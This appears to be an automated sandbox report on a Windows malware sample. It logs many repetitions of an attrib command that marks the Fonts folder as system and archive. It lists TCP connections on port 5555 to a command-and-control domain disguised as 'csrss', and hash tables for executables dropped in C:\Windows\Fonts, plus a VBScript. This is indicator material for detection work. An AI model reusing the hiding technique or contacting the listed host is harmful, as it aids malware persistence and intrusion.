C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | max.csrss.website | udp |
| US | 107.178.223.183:5555 | max.csrss.website | tcp |
| US | 8.8.8.8:53 | 18.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.223.178.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 107.178.223.183:5555 | max.csrss.website | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 104.155.138.21:5555 | max.csrss.website | tcp |
| US | 8.8.8.8:53 | 21.138.155.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 104.155.138.21:5555 | max.csrss.website | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 107.178.223.183:5555 | max.csrss.website | tcp |
| US | 107.178.223.183:5555 | max.csrss.website | tcp |
Files
memory/2784-0-0x0000000000400000-0x00000000009C1000-memory.dmp
C:\Windows\Fonts\svchost.exe
| MD5 | 0a7d7ed55c4202f5106824f11ecb22fa |
| SHA1 | 730da74e178d7b114e5d4c0f1dcc956accd4942d |
| SHA256 | 5657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595 |
| SHA512 | 45a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7 |
memory/2784-20-0x0000000000400000-0x00000000009C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tem.vbs
| MD5 | f88a489a387ebc7c4c0c6b122ff6aa9b |
| SHA1 | 197f045b81fc47892ec4b879f4b55ef1fda8f307 |
| SHA256 | 8d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a |
| SHA512 | 046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391 |
C:\Windows\Fonts\conhost.exe
| MD5 | 5d57bf45fb91812ead7ad8da8c3936a2 |
| SHA1 | 099c88af6ea4a49d2f80123c47fe85407ec42d69 |
| SHA256 | 553b1ab96e8204792f764fe25331aef9fa4c479b11b6154551d1b609e0158019 |
| SHA512 | 66b04caac0f5e1904bbd567a25734bf80dcf8982737e7bf6c68b10f07dd955445743ba76c0bad8cabf3650ec8202f73b864553ae10e39914a7c13395ee2a5cf3 |
C:\Windows\Fonts\KvMonXP.exe
| MD5 | 614a11a087f7e05063f6211c114a29ba |
| SHA1 | 903e200c338fd0a15e87214824c7f670cc7d282c |
| SHA256 | dda35a9441451839439a7da695209c6164ca0e7d0159b4bc012406a8a3f18ce4 |
| SHA512 | 947521a703af5c097199001f62cefc58b65d7cf723a4afe5a3b1f0b80e16ce7f357b1874f31b1cc5f55907fc18480e903313edcee02328b2527c00559d6d9f96 |
memory/1760-35-0x000001D714D30000-0x000001D714D40000-memory.dmp